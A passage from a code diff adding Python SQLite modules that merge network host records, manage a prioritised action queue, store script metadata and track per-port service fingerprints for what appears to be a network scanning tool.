if not real_mac or ':' not in real_mac:
return # nothing to do if we don't have a real MAC
now = int(time.time())
stub_key = f"IP:{ip}".lower()
real_key = real_mac.lower()
with self.base._lock:
con = self.base._conn
cur = con.cursor()
# Look up the stub: first by exact mac 'IP:<ip>', then fall back to any 'IP:%' row whose ips field contains this IP
cur.execute("""
SELECT * FROM hosts
WHERE lower(mac_address)=?
OR (lower(mac_address) LIKE 'ip:%' AND (ips LIKE '%'||?||'%'))
ORDER BY lower(mac_address)=? DESC
LIMIT 1
""", (stub_key, ip, stub_key))
stub = cur.fetchone()
# Look up the real host (if it already exists)
cur.execute("SELECT * FROM hosts WHERE lower(mac_address)=? LIMIT 1", (real_key,))
real = cur.fetchone()
if not stub and not real:
# No record: create the real one directly
cur.execute("""INSERT OR IGNORE INTO hosts
(mac_address, ips, hostnames, ports, vendor, essid, alive, first_seen, last_seen)
VALUES (?,?,?,?,?,?,1,?,?)""",
(real_key, ip, hostname or None, None, None, essid_hint or None, now, now))
con.commit()
return
if stub and not real:
# Rename the stub -> real MAC
ips_merged = self._union_semicol(stub['ips'], ip, sort_ip=True)
hosts_merged = self._union_semicol(stub['hostnames'], hostname)
essid_final = stub['essid'] or essid_hint
vendor_final = stub['vendor']
cur.execute("""UPDATE hosts SET
mac_address=?,
ips=?,
hostnames=?,
essid=COALESCE(?, essid),
alive=1,
last_seen=?
WHERE lower(mac_address)=?""",
(real_key, ips_merged, hosts_merged, essid_final, now, stub['mac_address'].lower()))
# Redirect references from other tables (if they exist)
self._redirect_mac_references(cur, stub['mac_address'].lower(), real_key)
con.commit()
return
if stub and real:
# Full merge into the real, then delete stub
ips_merged = self._union_semicol(real['ips'], stub['ips'], sort_ip=True)
ips_merged = self._union_semicol(ips_merged, ip, sort_ip=True)
hosts_merged = self._union_semicol(real['hostnames'], stub['hostnames'])
hosts_merged = self._union_semicol(hosts_merged, hostname)
ports_merged = self._union_semicol(real['ports'], stub['ports'])
vendor_final = real['vendor'] or stub['vendor']
essid_final = real['essid'] or stub['essid'] or essid_hint
first_seen = min(int(real['first_seen'] or now), int(stub['first_seen'] or now))
last_seen = max(int(real['last_seen'] or now), int(stub['last_seen'] or now), now)
cur.execute("""UPDATE hosts SET
ips=?,
hostnames=?,
ports=?,
vendor=COALESCE(?, vendor),
essid=COALESCE(?, essid),
alive=1,
first_seen=?,
last_seen=?
WHERE lower(mac_address)=?""",
(ips_merged, hosts_merged, ports_merged, vendor_final, essid_final,
first_seen, last_seen, real_key))
# Redirect references to real_key then delete stub
self._redirect_mac_references(cur, stub['mac_address'].lower(), real_key)
cur.execute("DELETE FROM hosts WHERE lower(mac_address)=?", (stub['mac_address'].lower(),))
con.commit()
return
# No stub but a real exists already: ensure current IP/hostname are unified
if real and not stub:
ips_merged = self._union_semicol(real['ips'], ip, sort_ip=True)
hosts_merged = self._union_semicol(real['hostnames'], hostname)
essid_final = real['essid'] or essid_hint
cur.execute("""UPDATE hosts SET
ips=?,
hostnames=?,
essid=COALESCE(?, essid),
alive=1,
last_seen=?
WHERE lower(mac_address)=?""",
(ips_merged, hosts_merged, essid_final, now, real_key))
con.commit()
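# Usage sketch (hypothetical call site; assumes the DB facade exposes this module, e.g. as db.hosts):
#   db.hosts.merge_ip_stub_into_real("192.168.1.42", "aa:bb:cc:dd:ee:ff",
#                                    hostname="printer.lan", essid_hint="OfficeWiFi")
# Depending on what already exists, this renames the stub row 'IP:192.168.1.42', merges it into the
# real MAC row (re-pointing mac_address references and deleting the stub), or simply enriches the
# existing real row; calling it again with the same arguments only refreshes alive/last_seen.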
def _redirect_mac_references(self, cur, old_mac: str, new_mac: str):
"""Redirect mac_address references in all relevant tables"""
try:
# Discover all tables with a mac_address column
cur.execute("""SELECT name FROM sqlite_master
WHERE type='table' AND name NOT LIKE 'sqlite_%'""")
for (tname,) in cur.fetchall():
if tname == 'hosts':
continue
try:
cur.execute(f"PRAGMA table_info({tname})")
cols = [r[1].lower() for r in cur.fetchall()]
if 'mac_address' in cols:
cur.execute(f"""UPDATE {tname}
SET mac_address=?
WHERE lower(mac_address)=?""",
(new_mac, old_mac))
except Exception:
pass
except Exception:
pass
# =========================================================================
# HELPER METHODS
# =========================================================================
def _parse_list(self, s: Optional[str]) -> List[str]:
"""Parse a semicolon-separated string into a list, ignoring empties"""
return [x for x in (s or "").split(";") if x]
def _sort_ip_key(self, ip: str):
"""Return a sortable key for IPv4 addresses; non-IPv4 values sort last"""
if ip and ip.count(".") == 3:
try:
return (0, tuple(int(x) for x in ip.split(".")))
except Exception:
pass
return (1, ip or "")  # malformed or non-IPv4 values sort after valid IPv4 keys
def _union_semicol(self, *values: Optional[str], sort_ip: bool = False) -> str:
"""Union deduplicated of semicolon-separated lists (ignores empties)"""
def _key(x):
if sort_ip and x.count('.') == 3:
try:
return tuple(map(int, x.split('.')))
except Exception:
return (0, 0, 0, 0)
return x
s = set()
for v in values:
if not v:
continue
for it in str(v).split(';'):
it = it.strip()
if it:
s.add(it)
if not s:
return ""
return ';'.join(sorted(s, key=_key))
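# Example behaviour of the helpers above (illustrative values):
#   _union_semicol("192.168.1.10;192.168.1.2", "192.168.1.2;10.0.0.1", sort_ip=True)
#     -> "10.0.0.1;192.168.1.2;192.168.1.10"   (deduplicated, numeric IPv4 ordering)
#   _parse_list("80;443;") -> ["80", "443"]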

410
db_utils/queue.py

@@ -0,0 +1,410 @@
# db_utils/queue.py
# Action queue management operations
import json
import sqlite3
from typing import Any, Dict, Iterable, List, Optional
import logging
from logger import Logger
logger = Logger(name="db_utils.queue", level=logging.DEBUG)
class QueueOps:
"""Action queue scheduling and execution tracking operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create action queue table and indexes"""
self.base.execute("""
CREATE TABLE IF NOT EXISTS action_queue (
id INTEGER PRIMARY KEY AUTOINCREMENT,
action_name TEXT NOT NULL,
mac_address TEXT NOT NULL,
ip TEXT NOT NULL,
port INTEGER,
hostname TEXT,
service TEXT,
priority INTEGER DEFAULT 50,
status TEXT DEFAULT 'pending',
retry_count INTEGER DEFAULT 0,
max_retries INTEGER DEFAULT 3,
created_at TEXT DEFAULT CURRENT_TIMESTAMP,
scheduled_for TEXT,
started_at TEXT,
completed_at TEXT,
expires_at TEXT,
trigger_source TEXT,
dependencies TEXT,
conditions TEXT,
result_summary TEXT,
error_message TEXT,
tags TEXT,
metadata TEXT,
FOREIGN KEY (mac_address) REFERENCES hosts(mac_address)
);
""")
# Optimized indexes for queue operations
self.base.execute("CREATE INDEX IF NOT EXISTS idx_queue_pending ON action_queue(status) WHERE status='pending';")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_queue_scheduled ON action_queue(scheduled_for) WHERE status='scheduled';")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_queue_mac_action ON action_queue(mac_address, action_name);")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_queue_key_status ON action_queue(action_name, mac_address, port, status);")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_queue_key_time ON action_queue(action_name, mac_address, port, completed_at);")
# Unique constraint for a single upcoming schedule per action/target
self.base.execute("""
CREATE UNIQUE INDEX IF NOT EXISTS uq_next_scheduled
ON action_queue(action_name,
COALESCE(mac_address,''),
COALESCE(service,''),
COALESCE(port,-1))
WHERE status='scheduled';
""")
logger.debug("Action queue table created/verified")
# =========================================================================
# QUEUE RETRIEVAL OPERATIONS
# =========================================================================
def get_next_queued_action(self) -> Optional[Dict[str, Any]]:
"""
Fetch the next action to execute from the queue.
Priority is boosted dynamically: +1 per 5 minutes since creation; the effective priority is capped at 100.
"""
rows = self.base.query("""
SELECT *,
MIN(100, priority + CAST((strftime('%s','now') - strftime('%s',created_at))/300 AS INTEGER)) AS priority_effective
FROM action_queue
WHERE status = 'pending'
AND (scheduled_for IS NULL OR scheduled_for <= datetime('now'))
ORDER BY priority_effective DESC,
COALESCE(scheduled_for, created_at) ASC
LIMIT 1
""")
return rows[0] if rows else None
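# Worked example of the boost (illustrative numbers): a pending action created 25 minutes ago
# with priority 50 gets floor(1500s / 300s) = +5, so priority_effective = MIN(100, 55) = 55.
# A priority-90 action created 2 hours ago would compute 90 + 24 = 114 and be clamped to 100.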
def list_action_queue(self, statuses: Optional[Iterable[str]] = None) -> List[Dict[str, Any]]:
"""List queue entries with a computed `priority_effective` column for pending items"""
order_sql = """
CASE status
WHEN 'running' THEN 1
WHEN 'pending' THEN 2
WHEN 'scheduled' THEN 3
WHEN 'failed' THEN 4
WHEN 'success' THEN 5
WHEN 'expired' THEN 6
WHEN 'cancelled' THEN 7
ELSE 99
END ASC,
priority_effective DESC,
COALESCE(scheduled_for, created_at) ASC
"""
select_sql = """
SELECT *,
MIN(100, priority + CAST((strftime('%s','now') - strftime('%s',created_at))/300 AS INTEGER)) AS priority_effective
FROM action_queue
"""
if statuses:
in_clause = ",".join("?" for _ in statuses)
return self.base.query(f"""
{select_sql}
WHERE status IN ({in_clause})
ORDER BY {order_sql}
""", tuple(statuses))
return self.base.query(f"""
{select_sql}
ORDER BY {order_sql}
""")
def get_upcoming_actions_summary(self) -> List[Dict[str, Any]]:
"""Summary: next run per action_name from the schedule"""
return self.base.query("""
SELECT action_name, MIN(scheduled_for) AS next_run_at
FROM action_queue
WHERE status='scheduled' AND scheduled_for IS NOT NULL
GROUP BY action_name
ORDER BY next_run_at ASC
""")
# =========================================================================
# QUEUE UPDATE OPERATIONS
# =========================================================================
def update_queue_status(self, queue_id: int, status: str, error_msg: Optional[str] = None, result: Optional[str] = None):
"""Update queue entry status with retry management on failure/expiry"""
self.base.invalidate_stats_cache()
if status == 'running':
self.base.execute(
"UPDATE action_queue SET status=?, started_at=CURRENT_TIMESTAMP WHERE id=?",
(status, queue_id)
)
elif status in ('failed', 'expired'):
self.base.execute("""
UPDATE action_queue
SET status=?,
completed_at=CURRENT_TIMESTAMP,
error_message=?,
result_summary=COALESCE(?, result_summary),
retry_count = MIN(retry_count + 1, max_retries)
WHERE id=?
""", (status, error_msg, result, queue_id))
elif status in ('success', 'cancelled'):
self.base.execute("""
UPDATE action_queue
SET status=?,
completed_at=CURRENT_TIMESTAMP,
error_message=?,
result_summary=COALESCE(?, result_summary)
WHERE id=?
""", (status, error_msg, result, queue_id))
# When execution succeeds, supersede old failed/expired attempts
if status == 'success':
row = self.base.query_one("""
SELECT action_name, mac_address, port,
COALESCE(completed_at, started_at, created_at) AS ts
FROM action_queue WHERE id=? LIMIT 1
""", (queue_id,))
if row:
try:
self.supersede_old_attempts(row['action_name'], row['mac_address'], row['port'], row['ts'])
except Exception:
pass
def promote_due_scheduled_to_pending(self) -> int:
"""Promote scheduled actions that are due (returns number of rows affected)"""
self.base.invalidate_stats_cache()
return self.base.execute("""
UPDATE action_queue
SET status='pending'
WHERE status='scheduled'
AND scheduled_for <= CURRENT_TIMESTAMP
""")
# =========================================================================
# QUEUE INSERTION OPERATIONS
# =========================================================================
def ensure_scheduled_occurrence(
self,
action_name: str,
next_run_at: str,
mac: Optional[str] = "",
ip: Optional[str] = "",
*,
port: Optional[int] = None,
hostname: Optional[str] = None,
service: Optional[str] = None,
priority: int = 40,
trigger: str = "scheduler",
tags: Optional[Iterable[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
max_retries: Optional[int] = None,
) -> bool:
"""
Ensure a single upcoming 'scheduled' row exists for the given action/target.
Returns True if inserted, False if already present (enforced by unique partial index).
"""
js_tags = json.dumps(list(tags)) if tags is not None and not isinstance(tags, str) else (tags if isinstance(tags, str) else None)
js_meta = json.dumps(metadata, ensure_ascii=False) if metadata else None
try:
self.base.execute("""
INSERT INTO action_queue(
action_name, mac_address, ip, port, hostname, service,
priority, status, scheduled_for, trigger_source, tags, metadata, max_retries
) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)
""", (
action_name, mac or "", ip or "", port, hostname, service,
int(priority), "scheduled", next_run_at, trigger, js_tags, js_meta, max_retries
))
self.base.invalidate_stats_cache()
return True
except sqlite3.IntegrityError:
return False
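# Usage sketch (hypothetical scheduler call; the variable name `queue` is an assumption):
#   inserted = queue.ensure_scheduled_occurrence("scan_ports", "2025-01-01 12:00:00",
#                                                mac="aa:bb:cc:dd:ee:ff", ip="192.168.1.42",
#                                                priority=40, trigger="on_interval:600")
#   # inserted is False if an occurrence for this action/target is already 'scheduled'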
def queue_action(self, action_name: str, mac: str, ip: str, port: Optional[int] = None,
priority: int = 50, trigger: Optional[str] = None, metadata: Optional[Dict] = None) -> None:
"""Quick enqueue of a 'pending' action"""
meta_json = json.dumps(metadata, ensure_ascii=False) if metadata else None
self.base.execute("""
INSERT INTO action_queue
(action_name, mac_address, ip, port, priority, trigger_source, metadata)
VALUES (?,?,?,?,?,?,?)
""", (action_name, mac, ip, port, priority, trigger, meta_json))
def queue_action_at(
self,
action_name: str,
mac: Optional[str] = "",
ip: Optional[str] = "",
*,
port: Optional[int] = None,
hostname: Optional[str] = None,
service: Optional[str] = None,
priority: int = 50,
status: str = "pending",
scheduled_for: Optional[str] = None,
trigger: Optional[str] = "scheduler",
tags: Optional[Iterable[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
max_retries: Optional[int] = None,
) -> None:
"""Generic enqueue that can publish 'pending' or 'scheduled' items with a date"""
js_tags = json.dumps(list(tags)) if tags is not None and not isinstance(tags, str) else (tags if isinstance(tags, str) else None)
js_meta = json.dumps(metadata, ensure_ascii=False) if metadata else None
self.base.execute("""
INSERT INTO action_queue(
action_name, mac_address, ip, port, hostname, service,
priority, status, scheduled_for, trigger_source, tags, metadata, max_retries
) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)
""", (
action_name, mac or "", ip or "", port, hostname, service,
int(priority), status, scheduled_for, trigger, js_tags, js_meta, max_retries
))
# =========================================================================
# HISTORY AND STATUS OPERATIONS
# =========================================================================
def supersede_old_attempts(self, action_name: str, mac_address: str,
port: Optional[int] = None, ref_ts: Optional[str] = None) -> int:
"""
Mark as 'superseded' all old attempts (failed|expired) for the triplet (action, mac, port)
earlier than or equal to ref_ts (if provided). Returns affected row count.
"""
params: List[Any] = [action_name, mac_address, port]
time_clause = ""
if ref_ts:
time_clause = " AND datetime(COALESCE(completed_at, started_at, created_at)) <= datetime(?)"
params.append(ref_ts)
return self.base.execute(f"""
UPDATE action_queue
SET status='superseded',
error_message = COALESCE(error_message, 'superseded by newer success'),
completed_at = COALESCE(completed_at, CURRENT_TIMESTAMP)
WHERE action_name = ?
AND mac_address = ?
AND COALESCE(port,0) = COALESCE(?,0)
AND status IN ('failed','expired')
{time_clause}
""", tuple(params))
def list_attempt_history(self, action_name: str, mac_address: str,
port: Optional[int] = None, limit: int = 20) -> List[Dict[str, Any]]:
"""
Return history of attempts for (action, mac, port), most recent first.
"""
return self.base.query("""
SELECT action_name, mac_address, port, status, retry_count, max_retries,
COALESCE(completed_at, started_at, scheduled_for, created_at) AS ts
FROM action_queue
WHERE action_name=? AND mac_address=? AND COALESCE(port,0)=COALESCE(?,0)
ORDER BY datetime(ts) DESC
LIMIT ?
""", (action_name, mac_address, port, int(limit)))
def get_action_status_from_queue(
self,
action_name: str,
mac_address: Optional[str] = None
) -> Optional[Dict[str, Any]]:
"""
Return the latest status row for an action (optionally filtered by MAC).
"""
if mac_address:
rows = self.base.query("""
SELECT status, created_at, started_at, completed_at,
error_message, result_summary, retry_count, max_retries,
mac_address, port, hostname, service, priority
FROM action_queue
WHERE mac_address=? AND action_name=?
ORDER BY datetime(COALESCE(completed_at, started_at, scheduled_for, created_at)) DESC
LIMIT 1
""", (mac_address, action_name))
else:
rows = self.base.query("""
SELECT status, created_at, started_at, completed_at,
error_message, result_summary, retry_count, max_retries,
mac_address, port, hostname, service, priority
FROM action_queue
WHERE action_name=?
ORDER BY datetime(COALESCE(completed_at, started_at, scheduled_for, created_at)) DESC
LIMIT 1
""", (action_name,))
return rows[0] if rows else None
def get_last_action_status_from_queue(self, mac_address: str, action_name: str) -> Optional[Dict[str, str]]:
"""
Return {'status': 'success|failed|running|pending', 'raw': 'status_YYYYMMDD_HHMMSS'}
based only on action_queue.
"""
rows = self.base.query(
"""
SELECT status,
COALESCE(completed_at, started_at, scheduled_for, created_at) AS ts
FROM action_queue
WHERE mac_address=? AND action_name=?
ORDER BY datetime(COALESCE(completed_at, started_at, scheduled_for, created_at)) DESC
LIMIT 1
""",
(mac_address, action_name)
)
if not rows:
return None
status = rows[0]["status"]
ts = self._format_ts_for_raw(rows[0]["ts"])
return {"status": status, "raw": f"{status}_{ts}"}
def get_last_action_statuses_for_mac(self, mac_address: str) -> Dict[str, Dict[str, str]]:
"""
Map action_name -> {'status':..., 'raw':...} from the latest queue rows for a MAC.
"""
rows = self.base.query(
"""
SELECT action_name, status,
COALESCE(completed_at, started_at, scheduled_for, created_at) AS ts
FROM (
SELECT action_name, status, completed_at, started_at, scheduled_for, created_at,
ROW_NUMBER() OVER (
PARTITION BY action_name
ORDER BY datetime(COALESCE(completed_at, started_at, scheduled_for, created_at)) DESC
) AS rn
FROM action_queue
WHERE mac_address=?
)
WHERE rn=1
""",
(mac_address,)
)
out: Dict[str, Dict[str, str]] = {}
for r in rows:
ts = self._format_ts_for_raw(r["ts"])
st = r["status"]
out[r["action_name"]] = {"status": st, "raw": f"{st}_{ts}"}
return out
# =========================================================================
# HELPER METHODS
# =========================================================================
def _format_ts_for_raw(self, ts_db: Optional[str]) -> str:
"""
Convert SQLite 'YYYY-MM-DD HH:MM:SS' to 'YYYYMMDD_HHMMSS'.
Fallback to current UTC when no timestamp is available.
"""
from datetime import datetime as _dt
ts = (ts_db or "").strip()
if not ts:
return _dt.utcnow().strftime("%Y%m%d_%H%M%S")
return ts.replace("-", "").replace(":", "").replace(" ", "_")

62
db_utils/scripts.py

@@ -0,0 +1,62 @@
# db_utils/scripts.py
# Script and project metadata operations
from typing import Any, Dict, List, Optional
import logging
from logger import Logger
logger = Logger(name="db_utils.scripts", level=logging.DEBUG)
class ScriptOps:
"""Script and project metadata management operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create scripts metadata table"""
self.base.execute("""
CREATE TABLE IF NOT EXISTS scripts (
name TEXT PRIMARY KEY,
type TEXT NOT NULL,
path TEXT NOT NULL,
main_file TEXT,
category TEXT,
description TEXT,
created_at TEXT DEFAULT CURRENT_TIMESTAMP
);
""")
logger.debug("Scripts table created/verified")
# =========================================================================
# SCRIPT OPERATIONS
# =========================================================================
def add_script(self, name: str, type_: str, path: str,
main_file: Optional[str] = None, category: Optional[str] = None,
description: Optional[str] = None):
"""Insert or update a script/project metadata row"""
self.base.execute("""
INSERT INTO scripts(name,type,path,main_file,category,description)
VALUES(?,?,?,?,?,?)
ON CONFLICT(name) DO UPDATE SET
type=excluded.type,
path=excluded.path,
main_file=excluded.main_file,
category=excluded.category,
description=excluded.description;
""", (name, type_, path, main_file, category, description))
def list_scripts(self) -> List[Dict[str, Any]]:
"""List all scripts/projects"""
return self.base.query("""
SELECT name, type, path, main_file, category, description, created_at
FROM scripts
ORDER BY name;
""")
def delete_script(self, name: str) -> None:
"""Delete a script/project metadata row by name"""
self.base.execute("DELETE FROM scripts WHERE name=?;", (name,))

191
db_utils/services.py

@@ -0,0 +1,191 @@
# db_utils/services.py
# Per-port service fingerprinting and tracking operations
from typing import Dict, List, Optional
import logging
from logger import Logger
logger = Logger(name="db_utils.services", level=logging.DEBUG)
class ServiceOps:
"""Per-port service fingerprinting and tracking operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create port services tables"""
# PORT SERVICES (current view of per-port fingerprinting)
self.base.execute("""
CREATE TABLE IF NOT EXISTS port_services (
id INTEGER PRIMARY KEY AUTOINCREMENT,
mac_address TEXT NOT NULL,
ip TEXT,
port INTEGER NOT NULL,
protocol TEXT DEFAULT 'tcp',
state TEXT DEFAULT 'open',
service TEXT,
product TEXT,
version TEXT,
banner TEXT,
fingerprint TEXT,
confidence REAL,
source TEXT DEFAULT 'ml',
first_seen TEXT DEFAULT CURRENT_TIMESTAMP,
last_seen TEXT DEFAULT CURRENT_TIMESTAMP,
is_current INTEGER DEFAULT 1,
UNIQUE(mac_address, port, protocol)
);
""")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_ps_mac_port ON port_services(mac_address, port);")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_ps_state ON port_services(state);")
# Per-port service history (immutable log of changes)
self.base.execute("""
CREATE TABLE IF NOT EXISTS port_service_history (
id INTEGER PRIMARY KEY AUTOINCREMENT,
mac_address TEXT NOT NULL,
ip TEXT,
port INTEGER NOT NULL,
protocol TEXT DEFAULT 'tcp',
state TEXT,
service TEXT,
product TEXT,
version TEXT,
banner TEXT,
fingerprint TEXT,
confidence REAL,
source TEXT,
seen_at TEXT DEFAULT CURRENT_TIMESTAMP
);
""")
logger.debug("Port services tables created/verified")
# =========================================================================
# SERVICE CRUD OPERATIONS
# =========================================================================
def upsert_port_service(
self,
mac_address: str,
ip: Optional[str],
port: int,
*,
protocol: str = "tcp",
state: str = "open",
service: Optional[str] = None,
product: Optional[str] = None,
version: Optional[str] = None,
banner: Optional[str] = None,
fingerprint: Optional[str] = None,
confidence: Optional[float] = None,
source: str = "ml",
touch_history_on_change: bool = True,
):
"""
Create/update the current (service,fingerprint,...) for a given (mac,port,proto).
Also refresh hosts.ports aggregate so legacy code keeps working.
"""
self.base.invalidate_stats_cache()
with self.base.transaction(immediate=True):
prev = self.base.query(
"""SELECT * FROM port_services
WHERE mac_address=? AND port=? AND protocol=? LIMIT 1""",
(mac_address, int(port), protocol)
)
if prev:
p = prev[0]
changed = any([
state != p.get("state"),
service != p.get("service"),
product != p.get("product"),
version != p.get("version"),
banner != p.get("banner"),
fingerprint != p.get("fingerprint"),
(confidence is not None and confidence != p.get("confidence")),
])
if touch_history_on_change and changed:
self.base.execute("""
INSERT INTO port_service_history
(mac_address, ip, port, protocol, state, service, product, version, banner, fingerprint, confidence, source)
VALUES (?,?,?,?,?,?,?,?,?,?,?,?)
""", (mac_address, ip, int(port), protocol, state, service, product, version, banner, fingerprint, confidence, source))
self.base.execute("""
UPDATE port_services
SET ip=?, state=?, service=?, product=?, version=?,
banner=?, fingerprint=?, confidence=?, source=?,
last_seen=CURRENT_TIMESTAMP
WHERE mac_address=? AND port=? AND protocol=?
""", (ip, state, service, product, version, banner, fingerprint, confidence, source,
mac_address, int(port), protocol))
else:
self.base.execute("""
INSERT INTO port_services
(mac_address, ip, port, protocol, state, service, product, version, banner, fingerprint, confidence, source)
VALUES (?,?,?,?,?,?,?,?,?,?,?,?)
""", (mac_address, ip, int(port), protocol, state, service, product, version, banner, fingerprint, confidence, source))
# Rebuild host ports for compatibility
self._rebuild_host_ports(mac_address)
def _rebuild_host_ports(self, mac_address: str):
"""Rebuild hosts.ports from current port_services where state='open' (tcp only)"""
row = self.base.query("SELECT ports, previous_ports FROM hosts WHERE mac_address=? LIMIT 1;", (mac_address,))
old_ports = set(int(p) for p in (row[0]["ports"].split(";") if row and row[0].get("ports") else []) if str(p).isdigit())
old_prev = set(int(p) for p in (row[0]["previous_ports"].split(";") if row and row[0].get("previous_ports") else []) if str(p).isdigit())
current_rows = self.base.query(
"SELECT port FROM port_services WHERE mac_address=? AND state='open' AND protocol='tcp'",
(mac_address,)
)
new_ports = set(int(r["port"]) for r in current_rows)
removed = old_ports - new_ports
new_prev = old_prev | removed
ports_txt = ";".join(str(p) for p in sorted(new_ports))
prev_txt = ";".join(str(p) for p in sorted(new_prev))
self.base.execute("""
INSERT INTO hosts(mac_address, ports, previous_ports, updated_at)
VALUES(?,?,?,CURRENT_TIMESTAMP)
ON CONFLICT(mac_address) DO UPDATE SET
ports = excluded.ports,
previous_ports = excluded.previous_ports,
updated_at = CURRENT_TIMESTAMP;
""", (mac_address, ports_txt, prev_txt))
# =========================================================================
# SERVICE QUERY OPERATIONS
# =========================================================================
def get_services_for_host(self, mac_address: str) -> List[Dict]:
"""Return all per-port service rows for the given host, ordered by port"""
return self.base.query("""
SELECT port, protocol, state, service, product, version, confidence, last_seen
FROM port_services
WHERE mac_address=?
ORDER BY port
""", (mac_address,))
def find_hosts_by_service(self, service: str) -> List[Dict]:
"""Return distinct host MACs that expose the given service (state='open')"""
return self.base.query("""
SELECT DISTINCT mac_address FROM port_services
WHERE service=? AND state='open'
""", (service,))
def get_service_for_host_port(self, mac_address: str, port: int, protocol: str = "tcp") -> Optional[Dict]:
"""Return the single port_services row for (mac, port, protocol), if any"""
rows = self.base.query("""
SELECT * FROM port_services
WHERE mac_address=? AND port=? AND protocol=? LIMIT 1
""", (mac_address, int(port), protocol))
return rows[0] if rows else None
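# Usage sketch (hypothetical values; assumes the DB facade exposes this module, e.g. as db.services):
#   db.services.upsert_port_service("aa:bb:cc:dd:ee:ff", "192.168.1.42", 80,
#                                   service="http", product="nginx", version="1.24",
#                                   confidence=0.92, source="ml")
#   db.services.get_services_for_host("aa:bb:cc:dd:ee:ff")   # -> rows ordered by port
#   db.services.find_hosts_by_service("http")                # -> MACs with an open http port
# Each upsert also rewrites hosts.ports from the currently open TCP ports so legacy consumers stay
# in sync, and records a port_service_history row whenever an existing fingerprint actually changes.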
